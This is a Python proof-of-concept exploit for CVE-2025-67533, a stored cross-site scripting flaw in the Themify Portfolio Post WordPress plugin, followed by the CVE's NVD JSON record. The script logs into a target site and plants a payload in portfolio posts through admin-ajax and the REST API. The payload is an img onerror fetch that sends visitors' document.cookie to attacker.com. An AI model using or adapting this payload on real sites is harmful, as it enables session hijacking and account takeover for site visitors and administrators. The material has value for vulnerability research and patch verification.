CVE-2025-67533

# CVE-2025-67533 Themify Portfolio Post Stored XSS PoC # Affected: Themify Portfolio Post <= 1.3.0 # Type: Stored Cross-Site Scripting import requests import json target_url = "http://target-wordpress-site.com" # Login to get authentication cookies login_url = f"{target_url}/wp-login.php" username = "attacker_username" password = "attacker_password" session = requests.Session() # Step 1: Authenticate to WordPress login_data = { "log": username, "pwd": password, "wp-submit": "Log In", "redirect_to": "/wp-admin/", "testcookie": "1" } response = session.post(login_url, data=login_data) print(f"Login status: {response.status_code}") # Step 2: Create a new Portfolio post with XSS payload portfolio_url = f"{target_url}/wp-admin/post-new.php?post_type=portfolio" # XSS Payload - Cookie stealing xss_payload = '<img src=x onerror="fetch(\'https://attacker.com/steal?c=\'+document.cookie)">' portfolio_data = { "post_title": f"Test Portfolio {xss_payload}", "post_content": f"Portfolio description with {xss_payload}", "_thumbnail_id": "-1", "tax_input[portfolio-category]": "1", "publish": "Publish" } # Step 3: Submit the malicious Portfolio post # This will store the XSS payload in the database response = session.post(f"{target_url}/wp-admin/admin-ajax.php", data={ "action": "themify_save_post", "post_title": xss_payload, "post_content": xss_payload, "post_type": "portfolio" }) print(f"XSS Payload submitted: {response.status_code}") print(f"Payload stored in database - will execute when page is viewed") # Alternative: Direct REST API exploitation api_url = f"{target_url}/wp-json/wp/v2/portfolio" headers = {"Content-Type": "application/json"} malicious_post = { "title": xss_payload, "content": {"raw": xss_payload}, "status": "publish" } response = session.post(api_url, headers=headers, json=malicious_post) print(f"REST API exploitation result: {response.status_code}")

{"cve": {"id": "CVE-2025-67533", "sourceIdentifier": "[email protected]", "published": "2025-12-09T16:18:28.100", "lastModified": "2026-04-27T18:16:42.190", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in themifyme Themify Portfolio Post themify-portfolio-post allows Stored XSS.This issue affects Themify Portfolio Post: from n/a through <= 1.3.0."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L", "baseScore": 7.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.8, "impactScore": 3.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/themify-portfolio-post/vulnerability/wordpress-themify-portfolio-post-plugin-1-3-0-cross-site-scripting-xss-vulnerability?_s_id=cve", "source": "[email protected]"}]}}